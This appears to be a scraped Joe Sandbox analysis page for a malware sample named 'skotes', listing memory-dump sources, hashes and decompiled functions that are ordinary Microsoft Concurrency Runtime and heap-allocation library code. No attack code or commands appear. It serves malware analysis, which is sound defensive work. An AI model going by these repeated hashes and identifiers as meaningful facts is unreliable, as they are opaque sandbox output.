Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9v$csm
API String ID: 1170836740-4019946690
Opcode ID: 5f07507e807447c87108c50946fd624e110d5e337f6fc95fc36b475050ca7bcf
Instruction ID: b70447007863704c39f18a9c1fa325a73fc7b980d1cf2bdb0470b046f6894156
Opcode Fuzzy Hash: 5f07507e807447c87108c50946fd624e110d5e337f6fc95fc36b475050ca7bcf
Instruction Fuzzy Hash: DD41C634A00209EFCF10DF68D888A9EBBF5BF45314F148155EC1A5B392D779EA15CB91

Function 00757364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007573B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007573F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0075740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00757419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00757440

Strings

count, xrefs: 0075737E
ppVirtualProcessorRoots, xrefs: 00757438

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: ffc8aa704bdf49b4d35e892567840a70ee34e7b7bc034e7ddf89f81a42260c39
Instruction ID: 15d31d35d8709caca3ab40cc108e0edeab5609a53a38e90e742c79decec512bd
Opcode Fuzzy Hash: ffc8aa704bdf49b4d35e892567840a70ee34e7b7bc034e7ddf89f81a42260c39
Instruction Fuzzy Hash: A8217134A00249EFCB14EF94D8899EDBBB5BF04351F1440A9EC0597351DBB8AE09CB90

Function 0074EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0074EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0074EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0074EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0074EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0074EF31

Strings

it, xrefs: 0074EED0

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: it
API String ID: 1182035702-337473458
Opcode ID: c18521f477e472eed3f278462cd71b90a41c69d993e9fdfcb227a4550665d626
Instruction ID: 3c9fdab3c7f08df2e0aaa9789b730762be1ccd682c84d4921f69cd4336b082ea
Opcode Fuzzy Hash: c18521f477e472eed3f278462cd71b90a41c69d993e9fdfcb227a4550665d626
Instruction Fuzzy Hash: DF216D70D14259CBDF64DFA4C8496EEB7F0BF15330F600A2EE051A61D1EBB95A48CB50

Function 007578E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00757903

Part of subcall function 00755CB8: __EH_prolog3_catch.LIBCMT ref: 00755CBF
Part of subcall function 00755CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00755CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0075792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00757936

Part of subcall function 00755CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00755D70
Part of subcall function 00755CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00755D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00757982
Concurrency::location::_Assign.LIBCMT ref: 007579A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 007579AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 007579BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 007579ED

Part of subcall function 0075691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00756942
Part of subcall function 0075691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00756965

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 6fbda1b75cc4cd8833ee8981542353ec50f1522e34b2be0c3fba419c334a9948
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 46310630B08255AECF1EAA7854A67FEB7B59F41302F0441A9DC85D7242DBAC6D4EC3A1

Function 00774C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00774C98
__alloca_probe_16.LIBCMT ref: 00774D5E
__freea.LIBCMT ref: 00774DCA

Part of subcall function 0076B04B: RtlAllocateHeap.NTDLL(00000000,3EB2933D,?,?,0074D3FC,3EB2933D,?,00747A8B,?,?,?,?,?,?,00737465,?), ref: 0076B07E

__freea.LIBCMT ref: 00774DD3
__freea.LIBCMT ref: 00774DF6

Strings

Zv,mv, xrefs: 00774C26

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: Zv,mv
API String ID: 1423051803-1104218811
Opcode ID: 5c72fbbc95d37478fef00767a77a252093ac1479bcdde0d8b6898617a782ceae
Instruction ID: db12db2e56d7a1783f982ee55c5c9a8ace03ab1b41b76263336ef50be95e37a7
Opcode Fuzzy Hash: 5c72fbbc95d37478fef00767a77a252093ac1479bcdde0d8b6898617a782ceae
Instruction Fuzzy Hash: D551D272700216AFDF319F64DC45EBB3AA9EF81790F158129FE49D7141EB38DC608AA0

Function 0075DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0075DD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0075DDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0075DE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0075DE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0075DE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0075DE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0075DE74

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
